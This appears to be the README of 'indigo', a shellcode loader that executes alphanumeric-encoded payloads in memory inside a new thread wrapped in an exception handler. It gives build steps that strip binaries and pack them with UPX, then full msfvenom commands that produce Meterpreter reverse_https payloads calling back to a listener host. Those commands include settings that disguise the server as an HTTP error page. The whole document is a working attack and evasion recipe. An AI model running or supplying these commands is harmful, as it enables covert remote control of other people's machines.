## Description

indigo is a means to execute alpha encoded shellcode in memory.

Upon shellcode generation, set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
It spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if one wraps indigo into another executable, it avoids process crash in case of unexpected behaviour.

## Building for Linux

32:
```
gcc -Wall -Os indigo.c -o indigo32
strip -sx indigo32
```
64:
```
gcc -Wall -Os indigo.c -fPIC -o indigo64
strip -sx indigo64
```

## Building for Windows

Create VisualStudio empty project and add source files.
Open:

Project->Properties->C/C++->Preprocessor->Preprocessor Definitions

Add:

`_CRT_SECURE_NO_WARNINGS`

Set the following environment variable before compilation:
```
SDK_DIR - Pointing to Platform SDK install directory.
```
Pack with UPX after compilation.

## Example usage

Generate a Metasploit shellcode and encode it with the alphanumeric encoder.
For a Linux target:
```
msfvenom -p linux/x86/meterpreter_reverse_https EXITFUNC=thread LPORT=6666 LHOST=192.168.1.1 EnableUnicodeEncoding=true SessionExpirationTimeout=0 SessionCommunicationTimeout=0 HttpUnknownRequestResponse="<html><body><h1>Error404</h1></body></html>" MeterpreterServerName=http stagerretrycount=2000 -a x86 -f raw BufferRegister=EAX -e x86/alpha_mixed
```
For a Windows target:
```
msfvenom -p windows/meterpreter/reverse_https EXITFUNC=thread LPORT=6666 LHOST=192.168.1.1 EnableUnicodeEncoding=true SessionExpirationTimeout=0 SessionCommunicationTimeout=0 HttpUnknownRequestResponse="<html><body><h1>Error404</h1></body></html>" MeterpreterServerName=http stagerretrycount=2000 -a x86 -f raw BufferRegister=EAX -e x86/alpha_mixed
```
Execute the multi/handler listener.
Execute the alphanumeric-encoded shellcode with this tool. 
For the Linux target:
```
./indigo32 <alphanumeric encoded code>
./indigo64 <alphanumeric encoded code>
```
For the Windows target:
```
C:\WINDOWS\Temp>indigo.exe <alphanumeric encoded code>
```

